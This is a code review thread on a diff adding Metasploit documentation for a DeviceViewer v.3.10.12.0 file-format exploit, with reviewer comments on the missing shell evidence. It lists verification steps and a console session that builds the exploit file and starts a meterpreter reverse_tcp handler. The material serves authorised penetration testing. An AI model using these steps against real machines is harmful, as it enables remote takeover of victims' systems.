documentation/modules/exploit/windows/fileformat/device_viewer.md

```diff
@@ -0,0 +1,115 @@
+
+## Verification Steps
+  Example steps in this format (is also in the PR):
+
+  1. Install the application on the target machine
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/fileformat/device_viewer```
+  4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+  5. Do: ```set LHOST [IP]```
+  6. Do: ```exploit```
+  7. This file will be created: ```DeviceViewer_v.3.10.12.0_exploit.txt stored at /home/[USER]/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt```
+  8. Do: ```use exploit/multi/handler```
+  9. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+  10. Do: ```set LHOST [IP]```
+  11. Do: ```exploit```
+  12. Do: on the target Windows machine open Device Viewer
+  13. Device Viewer's will present a login prompt
+  14. Do: paste the content of `DeviceViewer_v.3.10.12.0_exploit.txt` in the "User" field
+  15. Do: press the "Login" button
+  16. The handler will receive the newly created session
+ 
+## Options
+
+  **FILENAME**
+
+  The file name
+
+## Scenarios
+### DeviceViewer v.3.10.12.0 on Windows 10 (Pro x64 v.1909 Build 18363.720, DEP & ASLR enabled)
+
+```
+msf5 > use exploit/windows/fileformat/device_viewer 
+msf5 exploit(windows/fileformat/device_viewer) > show options
+
+Module options (exploit/windows/fileformat/device_viewer):
+
+   Name      Current Setting                       Required  Description
+   ----      ---------------                       --------  -----------
+   FILENAME  DeviceViewer_v.3.10.12.0_exploit.txt  no        The file name.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   DeviceViewer v.3.10.12.0 - Windows 10 Pro x64 (DEP + ASLR Bypass)
+
+
+msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.206.1
+lhost => 192.168.206.1
+msf5 exploit(windows/fileformat/device_viewer) > run
+
+[*] Trying target DeviceViewer v.3.10.12.0 - Windows 10 Pro x64 (DEP + ASLR Bypass)...
+[*] Creating 'DeviceViewer_v.3.10.12.0_exploit.txt' file ...
+[+] DeviceViewer_v.3.10.12.0_exploit.txt stored at /home/kali/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt
+msf5 exploit(windows/fileformat/device_viewer) > 
+msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
+msf5 exploit(multi/handler) > show options
+
+Module options (exploit/multi/handler):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Wildcard Target
+
+
+msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > set lhost 192.168.206.1
+lhost => 192.168.206.1
+msf5 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.206.1:4444 
+sf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
```

Comment:
From here on down is confusing. Shouldn't there be the shell connecting back? You haven't offered any evidence of this here and from the looks of things all I see is you trying to set up the same options you attempted to set up before but not getting a shell back; the documentation should be a clean copy of your setup, getting a shell, and then a `sysinfo` and `whoami` command to show what the system is as well as who you are running as.

Reply:
Much much better! Thanks for doing this @VoidSec :)